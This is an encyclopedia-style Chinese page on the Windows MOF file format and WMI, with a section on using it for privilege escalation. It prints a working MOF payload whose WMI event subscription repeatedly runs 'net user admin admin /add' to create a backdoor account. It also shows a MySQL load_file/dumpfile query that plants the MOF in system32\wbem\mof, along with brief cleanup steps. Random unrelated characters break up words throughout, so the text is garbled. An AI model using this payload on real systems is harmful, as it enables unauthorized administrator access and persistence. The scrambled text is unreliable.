mof格式

托管规提察对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后，可以对该文件进行编译。

• 中文名 mof格式
• 进    程 Mofcomp.exe
• 简    介 创建和注册提供程序简便方法
• 功    能 对文件进行编译

简介

　　托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和来自事件的简便方法。在 MOF 文件中创建类实例和类定义后，可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有360百科的类定义和实例。之后，提供程序、事件类别和事件信息便可由 便可由 WMI 和 Visual St亮想黄依原约udio Analyzer 使用。 在 MOF 文件中创建提供程序、事件类别和事件类的实例，并且定义想要分析的自定义对象，之后，就可以对该文件进行编译。

　　编译 MOF 文件时，将其提交到 MOF 编译器 (Mofcomp.exe)，编译器会分析该文件并将定义的类和实例添加到公共信息模型(CIM) 库。WMI:一个系统控制服务组件，比如，可以实现远程关高色标触秋机之类的。 Visual Stud草找助继批轻io Analyzer :VC++

提权及防范

　　Wind物第动波但河举带改调肥ows 管理规范 (WMI) 提供了以下三种方法编译到WMI存储库的托管对象格式 (MOF) 文件：

　　方法 1： 运行 速基通银苏往更MOF 文件指定为命令行参数将 Mofcomp.exe 文件。

　　方法2： 使用 I督层成笑对许初审晚油MofCompiler 接口和 $ CompileFile 方法。

　　方法 3： 拖放到%Sys福笔远刚费朝扬老temRoot%\System32\Wbem\MOF文件夹的 MOF 文件。

　　Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件，

　　或使用 IMofC能复北刘滑铁且真谁严周ompiler::CompileFile 方法。

　　注意:

　　第三种方法仅为向后兼容性与早期版本（win2003）的 WMI 提供，

　　并因为此功能可能不会提供在将来的版本后，不应使用。

　　鬼哥:

　　我现在只想知道怎么停止已执行的mof，

　　昨天测试的时候放了个.mof到

　　C:\WINDOWS\s款触较体未块刘较果永ystem32\wbem\mof\

　　从昨天晚上一直到现在还在每过完否脸田露始鲜5秒就执行次加个用户，

　质喜毫大包笔市演备八　搞的我郁闷死了。。。

　　解决办法：

　　第一 net stop win急mgmt 停止服务，

　　第二 删除文件夹：C:\WINDOWS\system32\wbem\Repository\

　　第三 net start winmgmt 启动服务

　　第四：完毕不会在执行了。

　　C:\WINDOWS\system32\wbem\Repository\ 放的是储存库　我们执行的.mof都会被加入到这个库了。

临本从燃普口　　然后一直按脚本设置的时间执行。。

　　删除后　重新启动　会重建个默认英储存库　这样我们先前执行mof零色鱼岩就没了。

　　-------------------------------XXX.MOF-------端分附阶攻复门----------------------------------------------------

　　#pragma namespace("\\\\.\\root\\subscription")

　　instance of 评__EventFilter as $EventFilter

　　{

　　Event候他Namespace = "Root\\Cimv2";

　　Name  = "filtP2";

　　Query = "Select * From __InstanceModificationEvent "

　　"Where TargetInstance Isa \"Win32_LocalTime\" "

　　"And TargetInstance.Second = 5";

　　QueryLanguage = "WQL";

　　};

　　instance of ActiveScriptEventConsumer as $Consumer

　　{

　　Name = "consPCSV2";

　　ScriptingEngine = "JScript";

　　ScriptText =

　　"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";

　　};

　　instance of __FilterToConsumerBinding

　　{

　　Consumer   = $Consumer;

　　Filter = $EventFilter;

　　};

　　-------------------------------XXX.MOF end-----------------------------------------------------------

　　最近的MYSQL提权也是利用此法.

　　1.找个可写目录，上传mof文件

　　2.执行sql

　　select load_file('C:\\RECYCLER\\nullevt.mof') into

　　dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';